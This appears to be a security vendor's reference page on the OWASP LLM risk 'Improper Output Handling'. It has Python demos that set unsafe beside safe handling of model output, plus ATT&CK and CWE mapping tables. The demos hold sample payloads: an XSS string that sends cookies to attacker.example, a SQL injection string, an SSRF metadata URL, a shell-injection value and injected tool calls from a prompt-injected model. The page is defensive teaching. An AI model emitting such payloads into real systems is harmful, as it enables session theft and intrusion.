OWASP LLM Top 10 · LLM05:2025 Improper Output Handling
AL
Founder at SQUR · last verified 2026-06-20
Regulation text
Improper output handling occurs when LLM-generated output is passed downstream to other systems without validation, sanitisation, or context-aware escaping. The output can enable XSS, CSRF, SSRF, privilege escalation, or remote code execution in the downstream components — particularly when the LLM output is used in dynamic queries, executed as code, or rendered in browser/email/document contexts.
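The four sinks the control names (browser, SQL query, server-side URL, command execution), each with the unhandled form beside the handled one, as an added example that is not SQUR's code and not from the OWASP project. The `*_OUTPUT` strings are constructed stand-ins for what a prompt-injected model could return; the ticket table, the `api.example.com` allowlist and the `echo` command are assumptions made for the demonstration. Nothing here touches the network.

```python
"""Improper vs. proper handling of LLM output at the four sinks LLM05 names.

Added example, not code from SQUR or from the OWASP project. The *_OUTPUT
strings are constructed stand-ins for what a prompt-injected model could
return; the ticket table, host allowlist and echo command are assumptions.
"""
import html
import re
import sqlite3
import subprocess
from urllib.parse import urlparse

# Constructed attacker-influenced model outputs, one per downstream sink.
XSS_OUTPUT = 'Done. <img src=x onerror="fetch(\'//attacker.example/?c=\'+document.cookie)">'
SQLI_OUTPUT = "' OR 1=1 --"
SSRF_OUTPUT = "http://169.254.169.254/latest/meta-data/"
RCE_OUTPUT = "report.txt; echo PWNED"   # a harmless second command so the demo can run


# Sink 1: browser rendering (CWE-79). Encode for the context the text lands in.
def render_unsafe(output: str) -> str:
    return f"<div class='answer'>{output}</div>"            # markup survives intact

def render_safe(output: str) -> str:
    return f"<div class='answer'>{html.escape(output, quote=True)}</div>"


# Sink 2: SQL (CWE-74). Bind the value; never splice model text into the statement.
def _tickets() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tickets(id INTEGER, owner TEXT, body TEXT)")
    conn.executemany("INSERT INTO tickets VALUES (?, ?, ?)",
                     [(1, "alice", "vpn down"), (2, "bob", "payroll export")])
    return conn

def query_unsafe(output: str, owner: str = "alice") -> list:
    sql = (f"SELECT id, body FROM tickets WHERE owner = '{owner}' "
           f"AND body LIKE '%{output}%'")              # "' OR 1=1 --" leaks bob's row
    return _tickets().execute(sql).fetchall()

def query_safe(output: str, owner: str = "alice") -> list:
    sql = "SELECT id, body FROM tickets WHERE owner = ? AND body LIKE ?"
    return _tickets().execute(sql, (owner, f"%{output}%")).fetchall()


# Sink 3: server-side fetch (CWE-918). Allowlist the destination before any request.
ALLOWED_HOSTS = {"api.example.com"}      # assumed allowlist for this example

def url_allowed(output: str) -> bool:
    u = urlparse(output.strip())
    # hostname (not netloc) is checked, so "https://api.example.com@evil/" fails too
    return u.scheme == "https" and u.hostname in ALLOWED_HOSTS


# Sink 4: command execution (CWE-94). Validate the value, then pass argv with no shell.
SAFE_NAME = re.compile(r"^[\w.-]{1,64}$")

def shell_unsafe(output: str) -> str:
    # shell=True lets ';' in the model output start a second command
    return subprocess.run("echo " + output, shell=True,
                          capture_output=True, text=True).stdout

def shell_safe(output: str) -> str:
    if not SAFE_NAME.match(output):
        raise ValueError("model output is not a plain filename")
    return subprocess.run(["echo", output], capture_output=True, text=True).stdout


if __name__ == "__main__":
    print(render_unsafe(XSS_OUTPUT))
    print(render_safe(XSS_OUTPUT))
    print(query_unsafe(SQLI_OUTPUT), query_safe(SQLI_OUTPUT))
    print(url_allowed(SSRF_OUTPUT), url_allowed("https://api.example.com/v1"))
    print(repr(shell_unsafe(RCE_OUTPUT)))
    try:
        shell_safe(RCE_OUTPUT)
    except ValueError as exc:
        print("rejected:", exc)
```

The unsafe SQL path returns both tenants' rows; the bound parameter returns none. The shell sink is the only one that executes anything, and the payload is a second `echo` rather than a download so the demo is harmless; either defence alone would have stopped it, since `SAFE_NAME` rejects the `;` and an argv list without a shell would have printed it as literal text even if validation were missing. At the fetch sink only the allowlist check is shown: a real client must also refuse redirects to non-allowlisted hosts and guard against DNS rebinding, because `urlparse` says nothing about where the name resolves.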
ATT&CK techniques this article tests · 15
| Technique | Why it maps | Confidence |
|---|---|---|
| T1190 | Where the LLM sits behind a public-facing application, unhandled output that reaches a downstream XSS or RCE sink gives an attacker initial access through that application. | 90% |
| T1203 | Model output rendered in a browser without encoding executes as script in the victim's session, the client-side execution case behind XSS. | 90% |
| T1059 | Model output passed to a shell, interpreter or eval() path is executed as code, which is the RCE case the control names. | 90% |
| T1068 | Model output that reaches a vulnerable downstream component can be shaped to trigger that component's flaw and escalate privileges on the host. | 80% |
| T1027 | An attacker who steers the model can have it emit encoded or obfuscated payloads that pass naive filters on the output path and are decoded downstream. | 80% |
| T1003 | Once RCE is obtained through an output sink, the attacker can dump OS credentials from the compromised host. | 70% |
| T1056 | XSS delivered through model output lets the attacker capture keystrokes or form data from affected users. | 80% |
| T1083 | RCE obtained through model output allows file and directory discovery on the compromised host. | 70% |
| T1021 | A downstream host compromised through model output becomes a pivot for lateral movement over remote services. | 70% |
| T1119 | RCE obtained through model output can be used to script the collection of sensitive data from the host. | 70% |
| T1071 | Code executed from model output can establish C2 over common application-layer protocols, blending with legitimate traffic. | 80% |
| T1041 | Data collected after a compromise through model output is exfiltrated over the established C2 channel. | 80% |
| T1490 | RCE obtained through model output can be used to delete backups or shadow copies and inhibit recovery. | 70% |
| T1486 | An attacker with RCE through model output can encrypt data for impact in a ransomware scenario. | 70% |
| T1499 | RCE obtained through model output can crash or disable critical services, causing an endpoint denial of service. | 70% |
Defending mitigations · 6
| Mitigation | What it does | Confidence |
|---|---|---|
| M1038 | Execution Prevention: application control and script blocking on the hosts that consume model output, so text that reaches a shell, interpreter or eval() path cannot run as code. Encoding output for the context it lands in remains the primary application-layer LLM05 control; M1038 limits the damage when that is missing. | 100% |
| M1040 | Behavior Prevention on Endpoint: endpoint rules that block suspicious behaviour, such as the application process spawning a shell or interpreter or writing executable files, catch model output that is executed despite validation. | 100% |
| M1028 | Operating System Configuration: hardening the downstream hosts (removing unneeded interpreters, restricting script execution policy, dropping setuid helpers) limits what executed model output can do and contains the blast radius of a successful exploit. | 90% |
| M1035 | Limit Access to Resource Over Network: restricting which hosts and services the downstream components can reach means model output used to build a URL cannot be turned into SSRF against internal services or cloud metadata endpoints. | 90% |
| M1047 | Audit: logging model output as received and as passed to each downstream sink, together with what the sink then did, gives the evidence needed to detect exploitation and reconstruct it afterwards. | 80% |
| M1030 | Network Segmentation: isolating the systems that process model output contains lateral movement from a compromised downstream host. | 80% |
Underlying weaknesses · 7
| CWE | Why it persists | Confidence |
|---|---|---|
| CWE-79 | Model output written into a web page without neutralisation is the cross-site scripting case the control names. | 100% |
| CWE-74 | Failure to neutralise special elements in model output before a downstream component interprets it is the general injection weakness behind the RCE, SQL and SSRF cases. | 100% |
| CWE-94 | Executing model output as code, or building code from it, is code injection: the model, and whoever can steer it, controls what runs. | 100% |
| CWE-918 | Model output used unvalidated to build URLs for server-side requests lets an attacker point the application at internal services (SSRF). | 100% |
| CWE-352 | Model output rendered as HTML can carry links, image tags or forms that make the victim's browser issue state-changing requests to other applications, the CSRF case the control names. | 100% |
| CWE-284 | When downstream components act on a model's claims about identity or permissions instead of enforcing access control themselves, output handling becomes a privilege-escalation path. | 90% |
| CWE-20 | Not validating model output as it enters a downstream system is the root weakness: output that is never checked against the expected format and content cannot be handled safely. | 90% |
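The CWE-284 and CWE-20 rows come together when the model's output is a structured tool call: the argument set and types are checked against a fixed schema, and authorisation is decided from the authenticated caller, never from anything the model asserts. Added example, not SQUR's or OWASP's code; the two actions, the ticket ownership table and the five model responses are constructed for illustration.

```python
"""Treating an LLM tool call as untrusted input: strict schema check plus
server-side authorisation.

Added example, not SQUR's or OWASP's code. The two actions, the ticket
ownership table and the model responses below are constructed.
"""
import json

# Fixed contract: which actions exist and exactly which typed arguments each takes.
ALLOWED_ACTIONS = {
    "lookup_ticket": {"ticket_id": int},
    "close_ticket": {"ticket_id": int, "reason": str},
}
# Constructed ownership data. Authorisation is decided here, from the
# authenticated caller, never from anything the model says about the caller.
TICKET_OWNER = {101: "alice", 102: "bob"}


class RejectedOutput(ValueError):
    """Model output that must not reach the downstream action."""


def parse_tool_call(raw: str) -> dict:
    """Accept only a JSON object with a known action and its exact argument set."""
    try:
        call = json.loads(raw)
    except json.JSONDecodeError as exc:
        raise RejectedOutput(f"not JSON: {exc.msg}")
    if not isinstance(call, dict) or set(call) != {"action", "args"}:
        raise RejectedOutput("expected exactly the keys action and args")
    action = call["action"]
    spec = ALLOWED_ACTIONS.get(action) if isinstance(action, str) else None
    if spec is None:
        raise RejectedOutput(f"unknown action {action!r}")
    args = call["args"]
    if not isinstance(args, dict) or set(args) != set(spec):
        raise RejectedOutput("argument set does not match the action's schema")
    for name, typ in spec.items():
        # bool is a subclass of int; reject it so true/false cannot stand in for an id
        if isinstance(args[name], bool) or not isinstance(args[name], typ):
            raise RejectedOutput(f"argument {name!r} has the wrong type")
    return {"action": action, "args": args}


def execute(raw: str, caller: str) -> str:
    """Run a validated call on behalf of the authenticated caller."""
    call = parse_tool_call(raw)
    ticket_id = call["args"]["ticket_id"]
    if TICKET_OWNER.get(ticket_id) != caller:
        raise RejectedOutput(f"{caller} may not act on ticket {ticket_id}")
    if call["action"] == "lookup_ticket":
        return f"ticket {ticket_id} belongs to {caller}"
    return f"ticket {ticket_id} closed: {call['args']['reason']}"


def is_rejected(raw: str, caller: str) -> bool:
    """True when the output is stopped before any action runs."""
    try:
        execute(raw, caller)
    except RejectedOutput:
        return True
    return False


# Constructed model responses, from benign to prompt-injected.
GOOD = '{"action": "lookup_ticket", "args": {"ticket_id": 101}}'
CROSS_TENANT = '{"action": "close_ticket", "args": {"ticket_id": 102, "reason": "done"}}'
UNKNOWN_ACTION = '{"action": "run_shell", "args": {"cmd": "id"}}'
EXTRA_FIELD = '{"action": "lookup_ticket", "args": {"ticket_id": 101}, "as_user": "admin"}'
WRONG_TYPE = '{"action": "lookup_ticket", "args": {"ticket_id": "101 OR 1=1"}}'

if __name__ == "__main__":
    print(execute(GOOD, "alice"))
    for raw in (CROSS_TENANT, UNKNOWN_ACTION, EXTRA_FIELD, WRONG_TYPE, "not json"):
        print("rejected" if is_rejected(raw, "alice") else "ACCEPTED", raw)
```

The same `CROSS_TENANT` call is rejected for alice and accepted for bob: the schema is identical in both cases, and only the authenticated caller decides. The `as_user` field is refused by the exact-key check rather than silently ignored, so a model coaxed into asserting a different identity gets no say at all.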
What SQUR Covers
Web application + API pentesting for OWASP Top 10, business logic flaws, authentication bypass, injection attacks, and other application-layer vulnerabilities. €1,995 per scan, 24-hour turnaround, EU-only data.
What SQUR Does Not Cover
Internal network pentesting, endpoint security testing, physical security assessments, social engineering, or ICT third-party concentration risk reviews. Engage a complementary provider for those scope items.
Provenance
Mapped Q2.2026 using gemini-2.5-flash · €0.0178 compute · voice-rubric self-validated